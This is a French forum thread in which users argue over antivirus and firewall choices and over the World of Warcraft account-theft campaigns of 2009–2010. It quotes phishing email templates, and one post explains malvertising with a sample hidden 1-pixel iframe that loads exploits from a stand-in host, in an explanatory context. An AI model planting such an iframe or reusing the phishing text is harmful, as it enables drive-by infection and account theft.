Reprise du message précédent :

Non. C'est une protection parmi tant d'autres justement

Et justement un av peut être à la rue sur une infection et pas sur les 100 suivantes. Ralph, av- compare (entre autres) ne cesse de mettre à jour des tests IRL justement et donc parlant, j'entends par là pas avec des attaques de virus qui ont 6 mois.

Le AV-Test sur W7 pour janv/fév 2014 est tombé: http://www.av-test.org/fr/tests/pa [...] nfev-2014/

Pour moi le meilleur antivirus est celui que tu codes toi même, vu qu'aucun auteur de malware ne pourra l'analyser et éventuellement le contourner.

 
C'est sur que le détournement d'antivirus, y en a eu vachement au cours de ces dernières années.......

Tu veux dire quoi par là ?

 
non rien laisses, j'ai mieux a faire que de repartir sur la meme discussion stérile qu'hier soir
 
surtout qu'avec la nouvelle règle c'est HS, et tant mieux!

Continue en MP alors

Alors cites des sources, parce que j'ai l'impression que tu cites de mémoire et que tu amalgames 2 failles sur un temps très court,  alors qu'il y a eu plusieurs mois entre les deux, meme si la derniere reprenait en partie celle de la première

Sur un forum de désinfection les 2 grosses infections avec failles sont celles de 2009 (Authenticator) et 2005 et on en avait discuté à l'époque (et une autre en 2010 avec 2 méthodes et toujours liée au Authenticator)

Suite à cela j'ai recherché un lien qui en faisait état avec surtout un tout en un parce que la flemme de chercher et surtout pas le temps
Le lien indiqué dans précédent message n'en fait pas état mais c'était LA MEME METHODE)

L'autre je passe dessus, car bien que faille mysql, ca été fait par des mecs qui voulaient se faire connaitre, et les joueurs qui disaparaissaient était de niveau 1 avec des comptes nouvellement crées
https://www.youtube.com/watch?v=6o8e1abGlEk

Pour 2009 et ce que tu appeles les failles 0-day il y avait une méthode de phishing

- Un faux message envoyé par l’éditeur de jeux intitulé « Cataclysm – Inscription Alpha ».

Ce faux message, demandait aux utilisateurs de cliquer sur un lien et d’entrer leurs codes ainsi que les identifiants, sous prétexte de tester une nouvelle version du jeu

Ex de message (il y en a d'autres) et si le lien apparaissait comme légitime, cela amenait sur des sites comme  warcraft.101mb.com (suffisait de passer la souris dessus)

__________________
World of Warcraft - Cataclysm™ Alpha Test
 
Vous avez été sélectionné pour participer à l'Alpha Test de World of Warcraft®: Cataclysm™ !  
(...)
Afin de participer à l'Alpha Test, vous devez mettre à niveau un compte actif possédant l'extension Wrath of the Lich King, vous permettant de vous connecter aux serveurs de test de Cataclysm™. La version de votre client World of Warcraft: Wrath of the Lich King doit être en version 3.1.2 ou plus afin d'installer le client Alpha Test.  
 
Veuillez fournir votre nom de compte et mot de passe World of Warcraft, ainsi que votre code Alpha se trouvant ci-dessous afin de vérifier votre éligibilité à vous connecter aux serveurs de Test Cataclysm. Pour participer à l'Alpha Test, vous devez avoir un compte World of Warcraft actif et en date depuis le 15 août 2009.  
 
Ci-dessous se trouve le code qui vous permettra de mettre à niveau votre compte World of Warcraft. Chaque code peut être utilisé une seule fois pour activer un compte World of Warcraft actif.  
 
XXXX-XXXXX-XXXXX-XXXXX
 
Rendez-vous sur http://xxxxxxx/en/alphasignup et suivez les instructions pas à pas pour mettre à niveau votre compte.  
 
Veuillez garder cet email dans vos archives. Si vous rencontrez des problèmes en mettant à niveau votre compte ou en accedant aux royaumes, veuillez envoyer un email au Service Facturation à wowbilling@blizzard.com.  
_______________________________
Y a une autre version en anglais

De :       wowaccountadmin (wowaccountadmin@blizzard.com)
Envoyé :  mar. 08/09/09 17:45
 
Greetings!
It has come to our attention that you are trying to sell/trade your personal World of Warcraft account(s).
As you may or may not be aware of, this conflicts with the EULA and Terms of Agreement.
If this proves to be true, your account can and will be disabled. It will be ongoing for further investigation by Blizzard Entertainment's employees.
-...)
_________________________________________

C'est arrivé en milieu de semaines et 2 jours après les corrections étaient appliquées par les AV (sauf un et pas des moindres)

Ensuite ca ne laissait que 10 secondes pour récupérer le compte
Il y avait une armée de chinois pour récupérer les 9.5 millions de comptes ? (il n'y avait pas de bot derrière pour de la récup automatique)
Du reste ca ne touchait que ceux qui ont succombé au phishing etc

Combien d'infectés ?

Chez BLIZZARD en septembre 2009 :
_________________
Au vu de la quantité de courriers que nous recevons, on peut dire que ces derniers temps, le nombre de tentatives de vol de compte est plutôt élevé. Après une vague de mails vous invitant à rejoindre la phase de test de Cataclysm qui vous conduisaient sur un site pour récolter vos données personnelles, il y a 2 arnaques qui tournent en ce moment :

   La première arnaque consiste à vous contacter dans le jeu en vous promettant un objet gratuit (monture ou autre) ou en vous annonçant que vous venez de gagner un objet mystérieux que vous recevrez dans quelques jours. Vous devez évidemment vous identifier sur un site ressemblant de près ou de loin à wow-europe en y entrant les informations de votre compte. Attention, ces sites sont souvent infectés, le simple fait de vous y rendre est risqué si vous n'êtes pas convenablement protégé.
    La seconde arnaque consiste à vous contacter par courrier pour vous prévenir que votre compte court un risque. Le principe de ces courriers est de vous faire peur et vous donner l'impression que si vous ne répondez pas de suite, vous risquez de perdre votre compte. Ce courrier vous invite à répondre en donnant les infos de votre compte, c'est évidemment du vol pur et simple, Blizzard ne vous demandera jamais ces infos par courrier.
--------------------------------

C'est n'est pas une attaque massive à l'aveugle, car IL Y AVAIT UNE INTERVENTION VOLONTAIRE des joueurs pour que cela agisse (entre l'appat du gain et la bétise ou distraction et panique et la négligence)

Donc 11.5 millions de joueurs infectés ?  

Ensuite la faille avec IE est apparue un peu plus tard et concernait LES ANCIENNES VERSIONS d'IE qui passaient sur http://www.dual-boxing.com et certaines pages (iepeers.dll' library. pour IE 6 et 7) La 8 était sortie depuis un an (faille exploitée : https://cve.mitre.org/cgi-bin/cvena [...] 2010-0806) et qui était exploitée sur les sites se terminant php?id=xx  (déja on voit ce que c'est)
La par contre Kaspersky avait réagi
(y avait aussi la page avec les cadeaux, les boosts etc mais je ne vais pas tout lister non plus)

http://img708.imageshack.us/img708/6738/capturerws.jpg

Tiens je vais reprendre ta phrase du début "Tu serais gentil par commencer de parler de ce que tu connais."

Tu fais erreur en disant que les virus d'il y a 10 ans figurent TOUJOURS dans les bases de la majorité  des CD de tests, car une majorité d' AV les ont extirpé de leur base . Fais quelques recherches...
De là à dire qu'on pourrait se faire infecter par une vieille vérole, en théorie c'est possible. En pratique moins car les AV font du comportemental (entre autre) , et disposent de plus de place dans le cloud pour y balancer un tas de trucs
Mais ca c'est plus récent

Ensuite MSE était efficace à l 'époque. Il ne l'est plus depuis au moins 2 ans. Il était meme le plus efficace pour contrer les merdouilles qui apparaissaient sur MSN (on avait fait quelques tests avec les fameux "tu veux voir ma tof ?" ) et chez Malekal aussi
Les failles exploitant des produits Microsoft (IE, MSN) , on peut supposer que ce sont des failles que Microsoft devait connaitre (il y en a d'autres connues qui ne sont toujours pas comblées, mais c'est .. peut etre volontaire)

Pour le lien j'ai répondu plus haut. (meme méthode etc)

Quant aux tests, suffit de regarder le protocole. Tout n'est pas testé avec des DVD de samples qui ont parfois jusqu'à 15 jours de retard. A une époque c'était kaspersky qui fournissait les CD de tests. Je ne sais qui maintenant

La meilleure école pour savoir de quoi il retourne ce sont les fora de désinfection
Ca permet de savoir avec quoi les gens sont infectés (la vérole du moment), pourquoi ils sont infecté (lire les rapport zhp, otl, ...) comment ils ont été infectés, quelles protections ils avaient etc
Sans compter, et les gens ne s'en doutent pas, c'est qu'à force de se taper des analyses, on peut en déduire le comportemental de la personne sur le net (et je passe sur ce qu'ils font avec leur PC etc car on peut aller plus loin encore)

Tu es a coté de la plaque, cherches "emcor.dll" mais malheureusement tu ne trouveras pas grand choses sur ce qui est de l'injection sur les sites "surs" à l'époque via injection dans les bannières de publicités. Et bien sur une faille IE pour permettre l'installation execution en mode privilégié..
 
Bien sur qu'au final ça se résume au un "man-in-the-middle" car Blizzard avait un peu merdé sur la gestion du token (en gros le trojan faisait planter le jeu pour éviter d'envoyer le code, l'envoyant au serveur des hackers qui le rejouait sur la page de gestion de compte... super). Bon entre temps ils ont mieux blindé le truc (geo-ip, confirmation par SMS, etc etc)
 
Bref l'attaque a débuté en Europe le mercredi soir, le vendredi matin MSE avait un blocage pour l'emcord.dll et dérivés, il a fallu attendre le lundi matin pour l'avoir sur Kaspersky (en gros une éternité...).
 
Et à l’époque ça avait bien fonctionné pour certaines banques US, qui avaient du passer à du triple-authentification (confirmation via SMS, reconnaissance via photo connue) en passant par un autre canal que le Net
 
Après je dis pas, MSE me parait bien léger par les temps qui courent, mais de la à dire qu'il est merdique, bof quoi.  
 
 
PS: je sais de quoi je parle, tu ne connais pas mon travail.

Il y a en qui bossent dans la sécurité, et il y a en qui lisent des sites de sécurité.

Ah bâ non pour toi ça ne sert à rien visiblement ... Donc c'est un boulot fictif ? ^^ dis donc tu y tiens à troller ... Sinon depuis les dernières maj de bitedefender je n'ai plus de souci avec le firewall, ma connexion n'est plus ralentit.

Tu sais lire ?  

Je n'ai pas dit que je bossais dans la sécurité, ni que je lisais des sites de sécurité.
Pour bitdefender, pourquoi utiliser leur firewall ? Celui de Windows ne te convient pas ? Il est trop light, trop intégrer au système, et trop gratuit ?
 

Pas compris pourquoi tu dis ça. Ca serait bien d'écrire des posts explicites.

Tu mélanges tout

emcor.dll c'est coté client et c'est une des partie visible du stealer(c'est un keylogger), je vois pas le rapport avec cette .dll pour l'injection d'une bannière de pub, et tu feras rire pas mal de monde en disant qu'on ne trouvera pas grand chose sur l'injection de "sites sûrs" (du reste ca ne veut rien dire un "site sûr). C'est par ex traité dans MISC depuis des années et ce avant 2010

De plus les exploits sur les sites webs, leur fonctionnement, ce n'est pas du domaine du confidentiel, on en parle depuis plus de 5 ans

Por les détails techniques sur le stealer en cause :

https://www.microsoft.com/security/ [...] 5459#tab=2

Ensuite je persiste

Pour qu'un site piége fonctionne (ce qui peut etre une bannière de pub) il faut que coté client il y ait une faille
Dans le cas présent la faille était dans IE6 et 7, alors qu'IE8 était sorti depuis un an

C'est meme tellement mal connu que je peux résumer (on est sur un forum grand public) en quelques lignes, de façon didactique et sans plonger dans le domaine technique

Un grand classique  : tu prends une iframe de 1 pixel de large (donc vu la taille c'est invisible)  pointant vers un ou plusieurs sites WEB contenant les exploits et le fichier à l'origine de l'infection

Du reste ce n'est pas dur de véroler une bannière avec
<iframe src="http://source_de_l'exploit.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>

Le plus dur c'est d'entrer sur le site hote qui envoie les pubs (la régie de pub car je reste dans la démonstration présente)
Mais on peut faire plus facile
Se faire passer pour un marchand, utiliser des bannières malicieuses et  les vendre à des regies de pubs.
Ces bannières lorsqu'elles seront affichées vont conduire aux exploits. (c'est arrivé à Adserve, Clicksor et d'autres très connues que l'on voit sur une majorité de sites)
Ceux qui ont attrapé des "fake police, gendarmerie" etc peuvent les remercier

D'ou l'interet de se protéger des régies de pub (mais c'est un autre débat)

Donc au moment de consulter la page, lorsque la pub s'affichera,  le navigateur va se connecter au site WEB contenu dans les iframes et ceci de manière automatique.
La première iframe va lancer un ou plusieurs exploits sur le navigateur WEB qui vont exploiter une faille de sécurité sur le navigateur afin de permettre le téléchargement, et l'execution des fichiers à l'origine de l'infection. LE tout bien entendu à l'insu de l'utilisateur du PC
Idéalement sans que l'AV l'intercepte

Une fois l'infection installée, l'AV peut couiner et détecter certains fichiers composant l'infection,  mais généralement il n'arrivera pas détecter la totalité de l'infection ou à supprimer l'infection en entier (on le voit avec les infections rootkitées)

Dans le cas présent il y avait un exploit

Les plus bourrins sont capables de balancer une vingtaine d'exploits pour toucher un max d'applications NON A JOUR  majoritairement, car ils exploitent des failles connues, ou pour les plus sophistiqués avec des failles connues mais pas encore comblés par l'éditeur ou pire des failles non connues  (les plus connues étant, Flash, Java, Adobe Reader mais ca peut toucher d'autres applis installées)

Donc je réitère :

Est ce que cela a affecté TOUS les comptes ?
Est ce qu'il ne fallait pas des conditions coté client pour que cela fonctionne ?

Tu n'as pas répondu autrement que de schématiser avec un "tu es à coté de la plaque" et en mettant ta profession dont je me fous. C'est ton argumentation qui compte là

Que les mecs se soient attaqués à une régie de pub, rien de plus classique (dernièrement RueDuCommerce, Yahoo, ..  ont subi la chose), cela se fait depuis des années, et les exploits sur les sites webs ca existe depuis bien avant 2007, mais la technique d'infection est une chose, le problème de l'antivirus également, mais il y a une part de responsabilité de l'utilisateur, ce que tu eclipses joyeusement avec ton "tu es à coté de la plaque" et en essayant de noyer le poisson

Ensuite tout rejeter sur l' AV c'est bien joli, mais ca fait des années que l'on dit aux gens de faire les mises à jours de leurs programmes
Un AV ne pourra rien contre la bétise et la négligence

Merdique il l'est.

Je peux t'envoyer des centaines de personnes qui se sont trouvé infecté avec du ZBOT/ZEUS et autres ransomware,  auquel on peut ajouter une pincée de Dirty decrypt. Tu leux expliqueras ta théorie
(les derniers que j'ai eu étaient un ring de serveurs de Mairie à travers la France avec pourtant pour certaines des admin système derrière. Ils ont tout perdu, d'autres ont payé.
Là j'avoue j'ai été incapable de les aider (clé unique pour chaque fichier)

Je vais remonter un peu dans le temps avec un extrait d'article que j'avais fais pour je ne sais plus qui ou quoi  début janvier 2013 avec un article à la base de ZDNET:

___________________________________
"Recalé deux fois de suite lors des tests de détection de menaces d’AV-Test, Microsoft relativise l’échec de Security Essentials et Forefront Endpoint Protection estimant que les malwares utilisés et non détectés ne sont pas un risque pour ses clients. Un argument un peu court"

L'agumentation de Microsoft pour sa défense :

"L''éditeur l’assure, seuls 0,0033% des clients de Security Essentials et Forefront Endpoint Protection ont été confrontés à ces malware. En outre, 94% des échantillons de malware non-détectés pendant l’audit AV-Test n’affectent pas ses clients."
______________________________________

Dans l'absolu ils n'ont pas tort mais ce n'est pas une bonne réponse et le chiffre ne peut pas etre aussi précis car les remontées ne sont pas systématiques surtout qu'il s'agissait de ransonware, et qu'une partie des gens ne cherchaient pas à comprendre ou ne savaient pas comment s'en débarasser et formataient (vu qu'ils étaient accusés de téléchargement illégal, parce que personne ne peut dire avec certitude si tout ce qu'il a sur ses disques durs n'est pas illégal, avec la peur et le stress ils formataient comme on a pu le voir sur les fora)

Ensuite pour couper court à la rumeur de l'époque (pas si lointaine) qui disait que l'UAC avait été désactivée pour les tests, j'avais contacté   : "Stephanie Borkowski - Chief Executive Officer Assistant (CEOA) qui m'avait confirmé que (parce que mal précisé dans le protocole de tests) l'UAC était toujours activé lors des tests.

En passant : SmartScreen est totalement inutile contre les exploits

Puis début octobre 2013

http://www.pcpro.co.uk/news/securi [...] s-rankings

Pour résumer :

Microsoft reconnait que Security Essentials ne peut pas se substituer à un véritable Anti virus tiers et qu'on ne devrait pas trop compter entièrement sur lui pour protéger son ordinateur.

Que MSE est un logiciel de base et qu'il agit comme une première couche de protection
Microsoft conseille à ses clients d'utiliser un antivirus supplémentaire

Donc si Microsoft le dit et le reconnait...

mais tu sais mieux que Microsoft car  "PS: je sais de quoi je parle, tu ne connais pas mon travail. "  

T'as un souci de nervosité et de tranquillité rassure moi ?

J'ai obtenu une clé pour la version totale à 11€ l'année, je donne donc mon retour sur cet antivirus dans le topal qui convient ... Le firewall de windows me suffit sinon.

 
d'autres arguments a 2 balles???
 
essayes un firewall comme outpost firewall pro, tu verras la différence....

Comme le disait LESTANQUET, vu le prix, et qui de plus s'appliquait à n'importe quelle version, autant prendre la version avec Firewall, qui ne travaille pas de façon indépendante, mais pour certains modules avec l'AV

Globalement,  les plus (je n'ai pas tout mis) :

_ IDS  : Une protection supplémentaire est fournie par le Système de Détection d'Intrusion (IDS).Le Système de Détection d'Intrusion surveille les activités du réseau et du système à la recherche d'activités malveillantes et de violations de politiques. Peut détecter et bloquer les tentatives de modification de fichiers système critiques, de fichiers de la Bitdefender ou d'entrées de registre, l'installation de pilotes malveillants et les attaques réalisées par injection de code (injection de DLL).

- Partage de Connexion Internet
- Connexions Bureau à distance entrantes (surveillance et autorisations ou non)
- Surveiller les connexions Wi-Fi - si vous êtes connecté(e) à des réseaux sans fil, des informations s'affichent au sujet d'événements réseau spécifiques (par exemple lorsqu'un nouvel ordinateur rejoint le réseau).
-  Journaux plus détaillés

Suivant ce que l'on fait, sa configuration, on peut avoir besoin de ces "petits plus", sans compter que la gestion du parefeu est plus accessible que cellle de windows (pour windows il existe des petits programmes que l'on ajouter qui peuvent faciliter la chose) comme

http://sphinx-soft.com/Vista/order.html

dont la version payante apporte vraiment un plus

Donc pourquoi s'en priver ? Sinon effectivement celui de windows peut suffire, surtout qu'il est bidirectionnel depuis XP. Tout dépend des besoins

 
non seulement on peut en avoir besoin mais c'est un vrai plus!
 
je ne me verrais pas revenir au firewall de windows, peut être avec un programme tiers pour l'utilisation de celui-ci, mais pas sur sur!
je suis content de ma licence a vie chez outpost, en espérant que la boite ne coule pas  

Et alors vous avez beaucoup d'alertes sur votre firewall payant ?
On tente souvent de vous rooter la machine ? Beaucoup de malwares tentent d'exfiltrer vos données numériques ?
 
Chez moi combo MSE/Firewall Windows, et jamais la moindre alerte depuis des années. Ca doit vraiment pas marcher. J'hésite à payer pour avoir plein d'alertes aussi.

 
tu commences clairement a me saouler avec ce genre de message arrogant et prétentieux
 
je n'ai aucun compte a te rendre et pour mon utilisation un firewall est un gros plus.  
 
et point barre.
 
arretes de nous gonfler

Tu devrais les désactiver, ce que tu fais est en contradiction avec ce que tu dis
Et puis c'est oublier tous les autres AV et FW gratuits, tu n'es pas obligé de payer pour avoir mieux que MSE/MSFW.

Je crois que je n'ai jamais vu autant de troll ! On dirait un tchat ^^

Bref ... On peut être infiltré sans même s'en rendre compte. Du coup chacun fait ce qu'il veut, payant ou non, av ou non ce n'est pas le sujet ici

Merci pour lien plus haut sur des tests d'av.

Et depuis 2003 tu en es où de ton projet ?

____________________________
Posté le 09-05-2003 à 11:51:18
Christaline a écrit :

"J'ai comme projet de vendre des logiciels (de ma création) sur internet a un tarif attractif de 10 ? par licence. "
___________________________

Dit le mec qui déconseille d'acheter quoi que ce soit ou qui n'a pas encore compris que l'architecture X86 est vérolée depuis sa conception,  et que son Windows, dès lors qu'il allume son ordi, qu'il y a une connection internet envoie une petite information de l'autre coté de l'atlantique  comme quoi il est sur le net à http://www.msftncsi.com/

"Je n'ai rien, à pars l'antivirus de Microsoft, parceque je ne trust pas un logiciel d'une société X et d'un pays Y qui se loge dans mon kernel, sans pouvoir vérifier ce qu'il fait au jour le jour."

Donc tu sais ce que fait NCSI ou tu le savais parce que tu l'avais vérifié, et que tu controles son activité au jour le jour  ?
J'en doute fortement.
Microsoft qui est une société X ne fait pas partie d'un pays "Y" ?

Les utilisateurs d'Adwcleaner sont toujours surpris des quelques merdouilles trouvées, meme si que des PUPS, alors qu'ils pensaient etre protégés..

T'en tiens une sacrée couche toi. Aller chercher un message de 2003 alors qu'on est en 2014, soit 11 ans en arrière, ça dépasse l'entendement ...  
Tu veux que j'aille chercher tes premiers "areuh areuh" à l'âge de 2 mois pendant qu'on y est ?  
 
 
Tu m'as l'air d'être un expert en architecture x86 et je serais curieux d'en savoir plus.  
Tu peux nous expliquer de manière très technique (tu peux aller bien loin, je te suivrais sans problème ) en quoi elle est vérolée depuis sa conception ?
 
 
Ca change quoi ?! Ca envoit aussi tous mes fichiers à chaque boot ?
N'importe quelle application qui se lance au démarrage de Windows va aussi envoyer une sorte de "ping", souvent dans le cadre d'un système de mis à jour automatique. Pour caricaturer, tout le monde serait au courant que tu as démarré ton PC, sauf Microsoft ? Ah non msftncsi existe, ouf me voilà rassuré.
 
 
Ce que tu n'as pas compris, c'est que j'utilise Windows.
...
...
...
Réfléchis un peu. J'utilise Windows. De Microsoft. J'utilise MSE. De Microsoft.
Si je ne trust pas, à la base, Windows, je ne trust pas non plus MSE.
...
Mais si j'utilise Windows, c'est que je le trust non ? Ca me parait pourtant évident, sinon je ne serais pas sous Windows, mais je serais plutôt sous un OS open source (ou mon propre OS ).
...
Dans ce cas, si je trust Windows, et par conséquent Microsoft, MSE ne fait plus partie d'une société X et d'un pays Y ... il fait partie intégrante de ma zone de confiance, simple, non ?
 
 
Pour faire encore plus simple : ils (USA) ont pas besoin de MSE pour accéder à mon PC, Windows suffit amplement. Par contre installer une solution antivirus d'un pays Y (autre que USA), ca peut être une très bonne porte d'entrée sur mon PC pour ce pays "Y". Et ça, j'en ai pas vraiment envie, seul la NSA a le droit de regarder ce que je fais.

On s'en fiche punaise ...

Le meilleur antivirus du monde ne peut pas tout voir ou tout faire (notamment les mises à jour des programmes ou la mise en place des patches des programmes)  et en plus avec Win8 il y a eu quelques changements dans la façon de procéder (un boot CD de votre AV favori n'est pas toujours facile à mettre en oeuvre)
 
 
Pour ceux qui sont sous Windows 8 et qui veulent activer le mode sans échec (ce qui peut etre utile en cas d'infection pour un nettoyage)
 
http://forum-windows7-windows8.fr/ [...] 133#p39133
 
 
Le problème du Boot CD
 
http://www.wordetweb.com/word-et-w [...] -OK-FR.htm
 
La lecture du dimanche :-)
 
http://infomars.fr/forum/?showtopic=5405
 
 
Programme à connaitre :
 
Petit add on pour ceux qui n'ont pas grand chose en protection (potentiel énorme, reste les maj pour que l'efficacité le soit. pour l'instant ca l'est)
 
http://www.crdf.fr/product/blockulicious/
 
 
Et un peu plus de discrétion sur le net
 
http://www.tutoriaux-excalibur.com [...] tiver.html
 
 
Si il y a urgence sur l'exploit de Word (le fix it est sur la page, sinon attendre le patch mensuel
 
https://support.microsoft.com/kb/2953095
 
Les détails techniques
http://blogs.technet.com/b/srd/arc [...] tions.aspx

 
Non ce n'est pas "NOUS" mais  Microsoft qui le dit :  
 
http://www.pcpro.co.uk/news/securi [...] s-rankings
 
Résumé :  
 
Microsoft reconnait que Security Essentials ne peut pas se substituer à un véritable Anti virus tiers et qu'on ne devrait pas trop compter entièrement sur lui pour protéger son ordinateur.
 Que MSE est un logiciel de base et qu'il agit comme une première couche de protection
Microsoft conseille à ses clients d'utiliser un antivirus supplémentaire
 
Un AV gratuit ?  
 
On ne choisit pas un AV parce qu'il est gratuit ou payant.
Tout dépend de ce que tu fais avec ton PC, et de ton comportemental de base  : Si tu fais tes mises à jour, si tu ne cliques pas tel lucky luke sur tout ce que tu vois passer ou installe avec le bouton "suivant", sans lire,  etc
 
 

 
Bonjour
Malheureusement sans ces précisions, on ne le peut pas.

 
Bah oui
C'est du meme genre que "Je voudrais une voiture... Essence ou diesel ?"
 
On ne sait pas si la personne vit dans le désert ou la montagne, si elle fait de la ville ou de la route, si elle est seule ou a une famille de 10 enfants etc  
Ce qui fait que la question n'est pas inepte, mais au final, elle n'est pas la bonne question
 

Oui on a donc besoin de ta façon de te servir du net .... Pour avoir un avis complet, sinon tu passes outre et tu mets avast ou avira.

 
y a pas d'antivirus pour telle ou telle utilisation.  
si tu joues avec le feu et si tu ne maitrises pas, tu risques de t'en mordre les doigts, même avec les meilleurs antivirus du moment.

Tu peux jeter un coup d’œil sur ces 2 sites de comparatives pour te faire une idée.
 
http://www.av-test.org/fr/tests/pa [...] nfev-2014/
http://www.av-comparatives.org/comparatives-reviews/
 
En gratuit je dirai Avast, Avira ou Bitdefender Free Edition accessible avec un vpn.
En payant Bitdefender, Kaspersky, ESET, Norton.
 
Mais aucun antivirus n'est parfait, il faut faire attention à ne pas cliquer sur tout ce qui bouge.
 
Tu peux utiliser VirusTotal en cas de doute.
 
https://www.virustotal.com/fr/docum [...] lications/

Il me semble qu'il n'y a pas de protection temps réel avec celui-là.

 
Ce n'est pas ce que j'ai dit.
 
Si c'est pour faire des conneries, qu'un AV soit gratuit ou pas, ca n'y changera rien. Au résultat,  un jour ou l'autre tu sera infecté
 
On peut se contenter d'un AV gratuit avec quelques petits trucs derrières pour compenser, en faisant ses mises à jour etc mais pour un usage "familial", pas pour aller chercher des cracks, steaming, P2P etc
 
Et lorsque je dis "usage familial" c'est avec quelques outils complémentaires, histoire de ne pas se faire infecter par une régie de pub, meme sur un site "safe" (c'est juste un exemple)

"Le mieux" en gratuit ça ne veut rien dire. Tu as des gratuits qui se tiennent, donc pour répondre à ta question c'est avast ou avira.

Lorsque tu comprendras qu'il ne peut y avoir de réponse précise tu auras tout compris. Tu fonctionnes de façon binaire

Hormis le fait de la question posée à laquelle tu ne veux pas répondre, il y a des différences de résultats suivant ce sur quoi on tombe

Là ce n'est pas tant les graphiques qu'il faut regarder, mais ce qui différencie les solutions gratuites et ce qu'elles apportent ou pas en fonction des menaces et de l'usage que l'on fait de son PC avec internet

http://dottech.org/14151/windows-b [...] st-vs-avg/

A cela on peut y ajouter qu'un test portant sur un mois n'est qu'indicatif, car la réactivité des labos varient suivant les mois, et suivant les types d'infections qui se présentent

Autrement tu sautes à la conclusion de Clubic qui n'est pas comme ils le disent un véritable test, mais une présentation avec tests (ce qui est honnete de leur part)

http://www.clubic.com/article-7707 [...] virus.html

"il n'y a pas un meilleur antivirus, mais plusieurs références, selon votre profil utilisateur."

Et si ma réponse ne te satisfait pas, prend celle de LESTANQUET

Non mais sans rire, t'es un pote à CRISTALINE ou à RALPH ? ou même un avatar de l'un deux ?  (Date d'arrivée sur le forum : 26/03/2014) Les réponses des autres personnes sont tout aussi acceptables que les miennes

Edit : Tu as l'air obsédé par MA réponse, comme le mec embusqué qui attend le faux pas :-)

Ben elle aurait suffi

LESTANQUET,  comme bien d'autres ici qui hantent ce forum, savent de quoi ils parlent, t'as donné une réponse qui aurait du te satisfaire, parce que relativement précise

Si je n'ai pas répondu directement c'est parce qu'il y a une raison, raison que j'ai formulé sous forme de question et que tu esquivais

Si tu relis, tu noteras que le choix d'un AV gratuit dépend de celui qui l'utilise (et encore on aurait pu aborder le coté "feeling" avec l'ergonomie, le coté "AV qui fonctionne mais se laisse oublier pour ne pas etre dérangé" et est en fonction de ce qui se présente comme menace (j'ai sauté l'étape un pour passer à la deux, vu que tu ne répondais pas à l'étape un)

Parce que perso je ne suis pas pour les AV gratuits
Pour moi ce ne sont que des produits d'appels, qui ne possèdent pas toutes les fonctionnalités face aux menaces d'aujourd'hui qui se présentent sous différentes formes. Ils ont tous un avantage et une lacune
En fait il faudrait tous les prendre et n'en faire qu'un , et savoir comment blinder autour (et tout cela n'est que relatif car le 100% d'efficacité face aux menances n'existe pas)

Ensuite je ne conseille pas directement un AV gratuit dans un fora public car on ne sait pas ce que la personne fait avec son PC (activités à risque ou pas) quelles sont ses connaissances en sécu, ce qu'il possède déja (ne serait ce qu'un firefox avec Adblocks et no scripts par ex) sans essayer de savoir pourquoi il peut se satisfaire d'un AV gratuit

C'est comme dire ici que l'on peut désactiver l'UAC et vivre sans AV. C'est tout à fait possible, mais ca ne se dit pas, car cela demande une grande vigilance, et dépasse les connaissances de la plupart des gens
Et là aussi le risque zéro n'existe pas

Je précise que je ne suis pas CONTRE les AV gratuits, seulement que vu que l'on peut trouver des solutions payantes nettement plus efficaces, en gratuit pour 6 mois ou un an, ou à moindre cout (moins de 4 euros pour un an) je ne comprends pas pourquoi on peut s'obstiner à QUE du gratuit sauf à opter pour une philosophie de vie où tout doit etre gratuit sur le PC
Le problème, ce sont les memes adeptes de cette philosophie qui se nourissent de cracks etc et qui raleront parce qu'ils se seront fait infecter

Et si tu veux jeter un oeil (il faut y aller régulièrement et etre patient car un an gratuit, on ne le voit passer que.. 2 ou 3 fois par an, idem pour les bons plans à bas prix, c'est suivant les périodes de l'année)

Ex : http://www.bitdefender.com/media/html/malwaretips/      <--- 6 mois gratuits (ca prend fin le 5/04/2014)

http://www.donotcrack.com/
http://store.v3.co.uk/?act=home
http://promoftheday.com/categories/
http://www.mostiwant.com/blog/cate [...] -software/

De temps en temps on voit passer des offres (à voir tous les jours, et accesoirement on tombera sur autre chose qu'un Av qui peut nous intéresser)

http://www.dealabs.com/2-3-hot.html

Comme ici

http://fr.giveawayoftheday.com/

ou là

http://dailysoftwaregiveaway.com/

ou encore

http://www.redcoon.fr/c02250000-Logiciels-Jeux-de-PC

Pour ce site j'ai toujours eu des doutes (il faut voir les prix) et je n'ai pas testé (les gens se plaignent pour les envois mais pas pour le dématérialisé comme les AV)
Donc prudence

http://www.aliexpress.com/wholesal [...] 0319113032

Aliexpress a derrière lui le groupe Alibaba (géant chinois qui vient de rentrer en bourse), et qui fait quand meme partie des 100 qui génèrent le plus de trafic au monde

Quels sont les méthodes pour analyser si on est infecté par un trojan , hors antivirus ?  
 
Netstat ? Wireshark (compliqué) ? ... ?